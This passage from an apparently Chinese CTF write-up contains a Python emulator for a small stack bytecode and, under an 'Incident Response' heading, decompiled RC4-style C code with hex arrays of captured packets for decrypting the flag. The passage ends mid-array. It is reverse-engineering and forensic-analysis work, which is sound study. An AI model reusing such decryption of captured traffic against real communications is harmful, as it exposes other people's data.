class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">stack = []</span><br><span class="line">v = {}</span><br><span class="line">v[<span class="number">4</span>] = <span class="number">0x5b4c</span></span><br><span class="line">v[<span class="number">5</span>] = <span class="number">0x0977</span></span><br><span class="line">v[<span class="number">6</span>] = <span class="number">0x5ad8</span></span><br><span class="line">v[<span class="number">7</span>] = <span class="number">0x8da7</span></span><br><span class="line"></span><br><span class="line">v[<span class="number">4</span>] = <span class="number">0x612c</span></span><br><span class="line">v[<span class="number">5</span>] = <span class="number">0x4445</span></span><br><span class="line">v[<span class="number">6</span>] = <span class="number">0xe078</span></span><br><span class="line">v[<span class="number">7</span>] = <span class="number">0x567c</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">push</span>(<span class="params">x</span>):</span><br><span class="line"> stack.append(x & <span class="number">0xffff</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pop</span>(<span class="params">sign = <span class="literal">False</span></span>):</span><br><span class="line"> value = stack.pop(<span class="built_in">len</span>(stack)-<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">if</span> value & <span class="number">0x8000</span> <span class="keyword">and</span> sign:</span><br><span class="line"> value -= <span class="number">0x10000</span></span><br><span class="line"> <span class="keyword">return</span> value</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> code.split(<span class="string">"\n"</span>):</span><br><span class="line"> s = line.split()</span><br><span class="line"> <span class="keyword">assert</span> <span class="built_in">len</span>(s) % <span class="number">2</span> == <span class="number">1</span></span><br><span class="line"></span><br><span class="line"> s = s[<span class="built_in">len</span>(s)/<span class="number">2</span>+<span class="number">1</span>:]</span><br><span class="line"> op = s[<span class="number">0</span>]</span><br><span class="line"> operands = <span class="built_in">map</span>(<span class="keyword">lambda</span> x:<span class="built_in">int</span>(x, <span class="number">16</span>), s[<span class="number">1</span>:])</span><br><span class="line"> <span class="built_in">print</span> op, operands</span><br><span class="line"> <span class="keyword">if</span> op == <span class="string">"sload"</span>:</span><br><span class="line"> push(v[operands[<span class="number">0</span>]])</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sstore"</span>:</span><br><span class="line"> t = pop()</span><br><span class="line"> v[operands[<span class="number">0</span>]] = t</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sspush"</span>:</span><br><span class="line"> push(operands[<span class="number">0</span>] << <span class="number">8</span> | operands[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"bpush"</span>:</span><br><span class="line"> push(operands[<span class="number">0</span>])</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sadd"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a + b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"ssub"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a - b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sxor"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a ^ b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sor"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a | b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sshr"</span>:</span><br><span class="line"> b = pop(<span class="literal">True</span>)</span><br><span class="line"> a = pop(<span class="literal">True</span>)</span><br><span class="line"> push(a >> b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sshl"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a << b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"smul"</span>:</span><br><span class="line"> b = pop(<span class="literal">True</span>)</span><br><span class="line"> a = pop(<span class="literal">True</span>)</span><br><span class="line"> push(a * b)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sxor"</span>:</span><br><span class="line"> b = pop()</span><br><span class="line"> a = pop()</span><br><span class="line"> push(a ^ b)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sconst_5"</span>:</span><br><span class="line"> push(<span class="number">5</span>)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sconst_1"</span>:</span><br><span class="line"> push(<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">elif</span> op == <span class="string">"sconst_3"</span>:</span><br><span class="line"> push(<span class="number">3</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"ERROR"</span></span><br><span class="line"> raw_input()</span><br><span class="line"> <span class="built_in">print</span> v</span><br><span class="line"> <span class="built_in">print</span> stack</span><br><span class="line"> </span><br><span class="line"><span class="built_in">print</span> <span class="built_in">map</span>(<span class="built_in">hex</span>, [v[<span class="number">4</span>], v[<span class="number">5</span>], v[<span class="number">6</span>], v[<span class="number">7</span>]])</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>Credit to 疯狂六月雪 & hen @KeenLab</p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="Incident-Response"><a href="#Incident-Response" class="headerlink" title="Incident Response"></a>Incident Response</h2><p>Found some interesting respond, dump it to file and parse it as x64 asm code.<br>Reverse the binary and write a c program to decode the flag.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"> <span class="type">int</span> a;</span><br><span class="line"> <span class="type">int</span> b;</span><br><span class="line"> <span class="type">char</span> key[<span class="number">256</span>];</span><br><span class="line">}ctx;</span><br><span class="line"></span><br><span class="line"><span class="type">__int64_t</span> <span class="title function_">crypt_ctx_init</span><span class="params">(ctx *context, <span class="type">char</span> *inKey)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">__int64_t</span> v2; <span class="comment">// rax@1</span></span><br><span class="line"> <span class="type">__int64_t</span> result; <span class="comment">// rax@3</span></span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> v4; <span class="comment">// dl@3</span></span><br><span class="line"> <span class="type">char</span> v5; <span class="comment">// r8@4</span></span><br><span class="line"></span><br><span class="line"> context->b = <span class="number">0</span>;</span><br><span class="line"> context->a = <span class="number">0</span>;</span><br><span class="line"> v2 = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> context->key[v2] = v2;</span><br><span class="line"> ++v2;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( v2 != <span class="number">256</span> );</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> v5 = context->key[result];</span><br><span class="line"> v4 += inKey[result & <span class="number">0x1F</span>] + context->key[result];</span><br><span class="line"> context->key[result++] = context->key[v4];</span><br><span class="line"> context->key[v4] = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( result != <span class="number">256</span> );</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> * <span class="title function_">decrypt</span><span class="params">(ctx *context, <span class="type">char</span> *buf, <span class="type">__int64_t</span> cbBuf)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> *v3; <span class="comment">// r10@1</span></span><br><span class="line"> <span class="type">int</span> v4; <span class="comment">// edx@2</span></span><br><span class="line"> <span class="type">__int64_t</span> v5; <span class="comment">// rax@2</span></span><br><span class="line"> <span class="type">char</span> v6; <span class="comment">// cl@2</span></span><br><span class="line"> <span class="type">__int64_t</span> v7; <span class="comment">// rdx@2</span></span><br><span class="line"> <span class="type">__int64_t</span> result; <span class="comment">// rax@2</span></span><br><span class="line"></span><br><span class="line"> v3 = &buf[cbBuf];</span><br><span class="line"> <span class="keyword">if</span> ( cbBuf )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> v4 = context->b;</span><br><span class="line"> v5 = (<span class="type">unsigned</span> <span class="type">char</span>)(context->a + <span class="number">1</span>);</span><br><span class="line"> context->a = v5;</span><br><span class="line"> v6 = context->key[v5];</span><br><span class="line"> v7 = (<span class="type">unsigned</span> <span class="type">char</span>)(v6 + v4);</span><br><span class="line"> context->b = v7;</span><br><span class="line"> context->key[v5] = context->key[v7];</span><br><span class="line"> context->key[v7] = v6;</span><br><span class="line"> result = (<span class="type">unsigned</span> <span class="type">char</span>)context->key[(<span class="type">unsigned</span> <span class="type">char</span>)(context->key[v5] + v6)];</span><br><span class="line"> *buf ^= result;</span><br><span class="line"> ++buf;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( v3 != buf );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br><span class="line"><span class="type">char</span> peer1_2[] = { <span class="comment">/* Packet 165 */</span></span><br><span class="line"> <span class="number">0x50</span>, <span class="number">0xbd</span> };</span><br><span class="line"><span class="type">char</span> peer0_3[] = { <span class="comment">/* Packet 167 */</span></span><br><span class="line"> <span class="number">0x95</span>, <span class="number">0x3b</span>, <span class="number">0x7a</span>, <span class="number">0xff</span>, <span class="number">0xd9</span>, <span class="number">0x18</span>, <span class="number">0x32</span>, <span class="number">0x3a</span>, </span><br><span class="line"> <span class="number">0x33</span>, <span class="number">0x28</span>, <span class="number">0x32</span>, <span class="number">0xe1</span>, <span class="number">0x12</span>, <span class="number">0xbe</span>, <span class="number">0xec</span>, <span class="number">0xa9</span>, </span><br><span class="line"> <span class="number">0x46</span>, <span class="number">0x30</span>, <span class="number">0x7d</span>, <span class="number">0x33</span>, <span class="number">0x54</span>, <span class="number">0xd5</span>, <span class="number">0x3c</span>, <span class="number">0xbd</span>, </span><br><span class="line"> <span class="number">0xc4</span>, <span class="number">0xc1</span>, <span class="number">0xcc</span>, <span class="number">0x80</span>, <span class="number">0x35</span>, <span class="number">0x3a</span>, <span class="number">0x25</span>, <span class="number">0x3d</span>, </span><br><span class="line"> <span class="number">0x88</span>, <span class="number">0xbf</span>, <span class="number">0x14</span>, <span class="number">0x69</span>, <span class="number">0xb7</span>, <span class="number">0xd1</span>, <span class="number">0xf3</span>, <span class="number">0x0d</span>, </span><br><span class="line"> <span class="number">0x17</span>, <span class="number">0x96</span>, <span class="number">0x4c</span>, <span class="number">0xb5</span>, <span class="number">0x19</span>, <span class="number">0x5f</span>, <span class="number">0x4c</span>, <span class="number">0x7e</span>, </span><br><span class="line"> <span class="number">0x15</span>, <span class="number">0xe1</span>, <span class="number">0x21</span>, <span class="number">0x5b</span>, <span class="number">0x5e</span>, <span class="number">0x24</span> };</span><br><span class="line"> <span class="type">char</span> peer1_3[] = { <span class="comment">/* Packet 169 */</span></span><br><span class="line"> <span class="number">0x10</span>, <span class="number">0xb6</span>, <span class="number">0xf8</span> };</span><br><span class="line"> <span class="type">char</span> peer0_4[] = { <span class="comment">/* Packet 170 */</span></span><br><span class="line"> <span class="number">0x48</span>, <span class="number">0xc8</span>, <span class="number">0x0c</span>, <span class="number">0x81</span>, <span class="number">0x3a</span>, <span class="number">0xce</span>, <span class="number">0x27</span>, <span class="number">0x92</span>, </span><br><span class="line"> <span class="number">0xd4</span>, <span class="number">0xbd</span>, <span class="number">0x18</span>, <span class="number">0x75</span>, <span class="number">0x1b</span>, <span class="number">0xbb</span>, <span class="number">0xfc</span>, <span class="number">0x49</span>, </span><br><span class="line"> <span class="number">0x15</span> };</span><br><span class="line"> <span class="type">char</span> peer1_4[] = { <span class="comment">/* Packet 172 */</span></span><br><span class="line"> <span class="number">0x3c</span>, <span class="number">0x18</span>, <span class="number">0x14</span>, <span class="number">0xac</span>, <span class="number">0x38</span>, <span class="number">0xa9</span> };</span><br><span class="line"> <span class="type">char</span> peer0_5[] = { <span class="comment">/* Packet 173 */</span></span><br><span class="line"> <span class="number">0x1d</span>, <span class="number">0x3d</span>, <span class="number">0xb5</span>, <span class="number">0x74</span>, <span class="number">0xae</span>, <span class="number">0x8a</span>, <span class="number">0x02</span>, <span class="number">0x13</span>, </span><br><span class="line"> <span class="number">0x87</span>, <span class="number">0x45</span>, <span class="number">0x14</span>, <span class="number">0xc1</span>, <span class="number">0x9e</span>, <span class="number">0x2d</span>, <span class="number">0xcf</span>, <span class="number">0x51</span>, </span><br><span class="line"> <span class="number">0x32</span>, <span class="number">0xc0</span>, <span class="number">0xb4</span>, <span class="number">0xc6</span>, <span class="number">0x15</span>, <span class="number">0xdb</span>, <span class="number">0x67</span>, <span class="number">0x31</span>, </span><br><span class="line"> <span class="number">0x36</span>, <span class="number">0x72</span>, <span class="number">0x2a</span>, <span class="number">0x2a</span>, <span class="number">0x2d</span>, <span class="number">0xad</span>, <span class="number">0x9f</span>, <span class="number">0x2f</span>, </span><br><span class="line"> <span class="number">0x91</span>, <span class="number">0xf6</span>, <span class="number">0x84</span>, <span class="number">0xfe</span>, <span class="number">0xa8</span>, <span class="number">0x9d</span>, <span class="number">0x60</span>, <span class="number">0x3b</span>, </span><br><span class="line"> <span class="number">0x0f</span>, <span class="number">0x9d</span>, <span class="number">0x22</span>, <span class="number">0x16</span>, <span class="number">0x5b</span>, <span class="number">0x95</span>, <span class="number">0x08</span>, <span class="number">0xe0</span>, </span><br><span class="line"> <span class="number">0x8b</span>, <span class="number">0x82</span>, <span class="number">0x3a</span>, <span class="number">0x3c</span>, <span class="number">0xad</span>, <span class="number">0x69</span>, <span class="number">0x85</span>, <span class="number">0xb9</span>, </span><br><span class="line"> <span class="number">0x13</span>, <span class="number">0xaa</span>, <span class="number">0xb1</span>, <span class="number">0xf3</span>, <span class="number">0xad</span>, <span class="number">0xff</span>, <span class="number">0x74</span>, <span class="number">0x72</span>, </span><br><span class="line"> <span class="number">0xc8</span>, <span class="number">0x22</span>, <span class="number">0xf0</span>, <span class="number">0x86</span>, <span class="number">0xd9</span>, <span class="number">0x16</span>, <span class="number">0x23</span>, <span class="number">0x3e</span>, </span><br><span class="line"> <span class="number">0x6c</span>, <span class="number">0x1f</span>, <span class="number">0xfd</span>, <span class="number">0xaa</span>, <span class="number">0x5f</span>, <span class="number">0x9f</span>, <span class="number">0x43</span>, <span class="number">0xe1</span>, </span><br><span class="line"> <span class="number">0x9b</span>, <span class="number">0xb4</span>, <span class="number">0x7c</span>, <span class="number">0xcd</span>, <span class="number">0xa2</span>, <span class="number">0xe9</span>, <span class="number">0xfc</span>, <span class="number">0xd0</span>, </span><br><span class="line"> <span class="number">0xa8</span>, <span class="number">0xcd</span>, <span class="number">0xbe</span>, <span class="number">0x88</span>, <span class="number">0xfb</span>, <span class="number">0xa2</span>, <span class="number">0x2f</span>, <span class="number">0x39</span>, </span><br><span class="line"> <span class="number">0xd0</span>, <span class="number">0xcb</span>, <span class="number">0x01</span>, <span class="number">0x4b</span>, <span class="number">0x76</span>, <span class="number">0x99</span>, <span class="number">0x15</span>, <span class="number">0xb7</span>, </span><br><span class="line"> <span class="number">0x43</span>, <span class="number">0x83</span>, <span class="number">0xf6</span>, <span class="number">0xf9</span>, <span class="number">0x60</span>, <span class="number">0xb7</span>, <span class="number">0x50</span>, <span class="number">0x45</span>, </span><br><span class="line"> <span class="number">0x9c</span>, <span class="number">0x9e</span>, <span class="number">0x2c</span>, <span class="number">0xa6</span>, <span class="number">0x02</span>, <span class="number">0x3b</span>, <span class="number">0xb1</span>, <span class="number">0x98</span>, </span><br><span class="line"> <span class="number">0x55</span>, <span class="number">0xb4</span>, <span class="number">0x43</span>, <span class="number">0x08</span>, <span class="number">0x29</span>, <span class="number">0x1c</span>, <span class="number">0x87</span>, <span class="number">0x74</span>, </span><br><span class="line"> <span class="number">0x27</span>, <span class="number">0xee</span>, <span class="number">0x2d</span>, <span class="number">0x5d</span>, <span class="number">0x32</span>, <span class="number">0x1a</span>, <span class="number">0x99</span>, <span class="number">0xba</span>, </span><br><span class="line"> <span class="number">0x6b</span>, <span class="number">0x6e</span>, <span class="number">0x8a</span>, <span class="number">0xbc</span>, <span class="number">0xd1</span>, <span class="number">0x35</span>, <span class="number">0x8a</span>, <span class="number">0x5d</span>, </span><br><span class="line"> <span class="number">0xf7</span>, <span class="number">0x69</span>, <span class="number">0x46</span>, <span class="number">0xc3</span>, <span class="number">0x17</span>, <span class="number">0x0a</span>, <span class="number">0xe2</span>, <span class="number">0x62</span>, </span><br><span class="line"> <span class="number">0xac</span> };</span><br><span class="line"> <span class="type">char</span> peer1_5[] = { <span class="comment">/* Packet 175 */</span></span><br><span class="line"> <span class="number">0xc9</span>, <span class="number">0xaf</span>, <span class="number">0x42</span>, <span class="number">0x66</span>, <span class="number">0x76</span>, <span class="number">0xee</span>, <span class="number">0x77</span>, <span class="number">0xa5</span>, </span><br><span class="line"> <span class="number">0xd1</span>, <span class="number">0x0c</span>, <span class="number">0xa0</span>, <span class="number">0xa3</span>, <span class="number">0x22</span>, <span class="number">0x05</span>, <span class="number">0xb3</span>, <span class="number">0x02</span>, </span><br><span class="line"> <span class="number">0x77</span>, <span class="number">0x25</span> };</span><br><span class="line"> <span class="type">char</span> peer0_6[] = { <span class="comment">/* Packet 176 */</span></span><br><span class="line"> <span class="number">0xc5</span>, <span class="number">0x49</span>, <span class="number">0x1f</span>, <span class="number">0xcb</span>, <span class="number">0x60</span>, <span class="number">0x22</span>, <span class="number">0x9b</span>, <span class="number">0x3c</span>, </span><br><span class="line"> <span class="number">0x52</span>, <span class="number">0x56</span>, <span class="number">0x1f</span>, <span class="number">0x98</span> };</span><br><span class="line"> <span class="type">char</span> peer1_6[] = { <span class="comment">/* Packet 188 */</span></span><br><span class="line"> <span class="number">0x9a</span>, 